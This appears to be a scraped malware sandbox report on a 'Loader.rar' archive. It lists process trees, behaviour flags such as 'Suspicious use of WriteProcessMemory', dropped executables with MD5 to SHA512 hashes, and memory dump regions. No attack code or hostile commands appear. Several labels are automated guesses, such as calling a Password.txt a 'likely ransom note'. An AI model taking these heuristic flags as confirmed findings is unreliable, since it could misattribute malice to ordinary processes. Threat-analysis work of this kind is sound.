C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3144 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5016 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5772 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3764 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5628 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5780 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=6040 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=4140 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=5960 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=5412 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=5936 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3604 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:82⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5328 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Loader.rar"2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO89BE2BE8\Password.txt3⤵
- Opens file in notepad (likely ransom note)
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=4640 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=6508 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:82⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.logFilesize
226B
MD528d7fcc2b910da5e67ebb99451a5f598
SHA1a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA2562391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA5122d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d34112a7b4df3c9e30ace966437c5e40
SHA1ec07125ad2db8415cf2602d1a796dc3dfc8a54d6
SHA256cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf
SHA51249fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d336b18e0e02e045650ac4f24c7ecaa7
SHA187ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA25687e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52247453c28acd1eb75cfe181540458a8
SHA1851fc5a9950d422d76163fdc6a453d6859d56660
SHA256358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd
SHA51242475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50d53533b226ada04703fc90b556978a4
SHA14bf5e331fce099468eb2f4f34cbedf9411ddb8ae
SHA2561589ebd677356cd2f45d1c79acfe8b8c2e03fa64931aff06e0fd9298cddd58e3
SHA5121215eb84f69328a4bd085dddb4451d027d2569f4d7990b2e492682e17c5aa327015016a27cd384aa4968dfbaea731446b74b0562d73a41ce280e5caab32e3b55
-
C:\Users\Admin\AppData\Local\Temp\7zO89BE2BE8\Password.txtFilesize
89B
MD51ef53826ba072b8b014ccb6739bd9e2f
SHA1e3cd91d8ecd143e93a19b94f37f546a8fc9e58c8
SHA25660cf7ce1de44d6591dba90246dc1f2d4b3d25ffae2084cf17fcd975f56bb996b
SHA5123cbdf8c6481fef5686a828b749bc87a2fffe524cd46cbdb18b2110b8ac6b247835383a6604a9a32ae6c71268663859fde7457f7ee7549c1f345783f5ce1b14ff
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lh1oqmnq.145.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr2.exeFilesize
355KB
MD5c93d65bc0ed7ee88d266b4be759301f8
SHA18c0c415ba824737c61904676e7132094f5710099
SHA256f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f
SHA5127a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1
-
C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr3.exeFilesize
5.2MB
MD5f55fc8c32bee8f7b2253298f0a0012ba
SHA1574c7a8f3eb378c03f58bc96252769296b20970e
SHA256cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9
SHA512c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a
-
C:\Users\Admin\Desktop\Loader.rarFilesize
3.8MB
MD56708336a25163b73dd47bc09f57818fa
SHA136a31642c5f77cba5c4c0de905063e0b033a4986
SHA256b1ee03942664668e5e21997036234359542ee889c8d51e2699cbe6c8727cd19d
SHA51234e8f4913a393f71032699b32deb65103268b72e830ca870003a117a0c4a9bd7d4fb2e60cb520788fbffc08ec6cb9b189d93995d5f93e864befe89cf7946cbf1
-
C:\Users\Admin\Desktop\Loader\Launcher.dllFilesize
7.5MB
MD5cbb81f28c5a509e4f7e3e44bc7da74f8
SHA147145f07bc7d0083d3bd13a9da44bac740952029
SHA256413bf9c2cff6fe7b97eae199683df7f6d648fad4c25cb6d0b7dce335eb69edba
SHA512bc863ebb2f5fd66f342be8befb49889dd275adb15cff95ed378e185190091589c8d1d7a8902ca889a7b2af81588c731bfa0a930f074fecadd9b47a082966079c
-
C:\Users\Admin\Desktop\Loader\Loader.exeFilesize
7KB
MD5b5e479d3926b22b59926050c29c4e761
SHA1a456cc6993d12abe6c44f2d453d7ae5da2029e24
SHA256fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
SHA51209d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
C:\Users\Admin\Desktop\Loader\mainf.dllFilesize
6KB
MD5dfbad6728654395df7cdc4626686bdd7
SHA163686f523d7b4bf33c6184ce7d870fa326ce4bba
SHA256ba7ee4cc8044c4aeac2c9b698a32a6d01020097e14730abc7040cd9f0ee0608c
SHA512e2ff8afcd090adc2a846152fa5f0055ade47b8d9a19e6d2ff1f20092b987db98729388142f56af716b8dc659e66188ecfa4ba35b55353e7636a58a78c7ce6abd
-
memory/336-226-0x000001E4B6A30000-0x000001E4B6A5B000-memory.dmpFilesize
172KB
-
memory/336-227-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/628-223-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/628-218-0x00000200A2090000-0x00000200A20B4000-memory.dmpFilesize
144KB
-
memory/628-222-0x00000200A24B0000-0x00000200A24DB000-memory.dmpFilesize
172KB
-
memory/652-115-0x00000000003A0000-0x000000000040D000-memory.dmpFilesize
436KB
-
memory/652-69-0x00000000003A0000-0x000000000040D000-memory.dmpFilesize
436KB
-
memory/652-107-0x0000000004420000-0x0000000004820000-memory.dmpFilesize
4.0MB
-
memory/652-108-0x0000000004420000-0x0000000004820000-memory.dmpFilesize
4.0MB
-
memory/652-109-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmpFilesize
2.0MB
-
memory/652-111-0x0000000077150000-0x0000000077365000-memory.dmpFilesize
2.1MB
-
memory/692-236-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/692-234-0x0000022B1C300000-0x0000022B1C32B000-memory.dmpFilesize
172KB
-
memory/916-585-0x0000000000360000-0x00000000003CD000-memory.dmpFilesize
436KB
-
memory/916-538-0x0000000000360000-0x00000000003CD000-memory.dmpFilesize
436KB
-
memory/2356-213-0x00007FFA54230000-0x00007FFA542EE000-memory.dmpFilesize
760KB
-
memory/2356-206-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/2356-215-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/2356-208-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/2356-209-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/2356-211-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/2356-212-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmpFilesize
2.0MB
-
memory/2356-207-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/2656-165-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmpFilesize
2.0MB
-
memory/2656-152-0x0000000000380000-0x00000000003ED000-memory.dmpFilesize
436KB
-
memory/2656-164-0x0000000003480000-0x0000000003880000-memory.dmpFilesize
4.0MB
-
memory/2656-167-0x0000000077150000-0x0000000077365000-memory.dmpFilesize
2.1MB
-
memory/2656-169-0x0000000000380000-0x00000000003ED000-memory.dmpFilesize
436KB
-
memory/3300-634-0x0000000000620000-0x000000000068D000-memory.dmpFilesize
436KB
-
memory/3300-661-0x0000000000620000-0x000000000068D000-memory.dmpFilesize
436KB
-
memory/3448-120-0x0000000002A80000-0x0000000002E80000-memory.dmpFilesize
4.0MB
-
memory/3448-114-0x0000000000EA0000-0x0000000000EA9000-memory.dmpFilesize
36KB
-
memory/3448-126-0x0000000077150000-0x0000000077365000-memory.dmpFilesize
2.1MB
-
memory/3448-124-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmpFilesize
2.0MB
-
memory/3476-116-0x00000000033E0000-0x00000000037E0000-memory.dmpFilesize
4.0MB
-
memory/3476-93-0x0000000000660000-0x00000000006CD000-memory.dmpFilesize
436KB
-
memory/3476-121-0x0000000077150000-0x0000000077365000-memory.dmpFilesize
2.1MB
-
memory/3476-118-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmpFilesize
2.0MB
-
memory/3476-123-0x0000000000660000-0x00000000006CD000-memory.dmpFilesize
436KB
-
memory/3812-751-0x0000000000A70000-0x0000000000A78000-memory.dmpFilesize
32KB
-
memory/3864-128-0x0000000002960000-0x0000000002D60000-memory.dmpFilesize
4.0MB
-
memory/4184-44-0x000001E1C0E60000-0x000001E1C0E82000-memory.dmpFilesize
136KB
-
memory/4336-580-0x0000000000220000-0x0000000000228000-memory.dmpFilesize
32KB
-
memory/4556-33-0x00000000006A0000-0x00000000006A8000-memory.dmpFilesize
32KB
-
memory/4824-172-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmpFilesize
2.0MB
-
memory/4824-174-0x0000000077150000-0x0000000077365000-memory.dmpFilesize
2.1MB
-
memory/4824-171-0x0000000002830000-0x0000000002C30000-memory.dmpFilesize
4.0MB
-
memory/5528-1032-0x0000000000080000-0x00000000000ED000-memory.dmpFilesize
436KB
-
memory/5528-1067-0x0000000000080000-0x00000000000ED000-memory.dmpFilesize
436KB
-
memory/5664-674-0x00000000007C0000-0x00000000007C8000-memory.dmpFilesize
32KB
-
memory/6052-562-0x00000000000A0000-0x000000000010D000-memory.dmpFilesize
436KB
-
memory/6052-507-0x00000000000A0000-0x000000000010D000-memory.dmpFilesize
436KB
-
memory/6092-710-0x0000000000D50000-0x0000000000DBD000-memory.dmpFilesize
436KB
-
memory/6092-735-0x0000000000D50000-0x0000000000DBD000-memory.dmpFilesize
436KB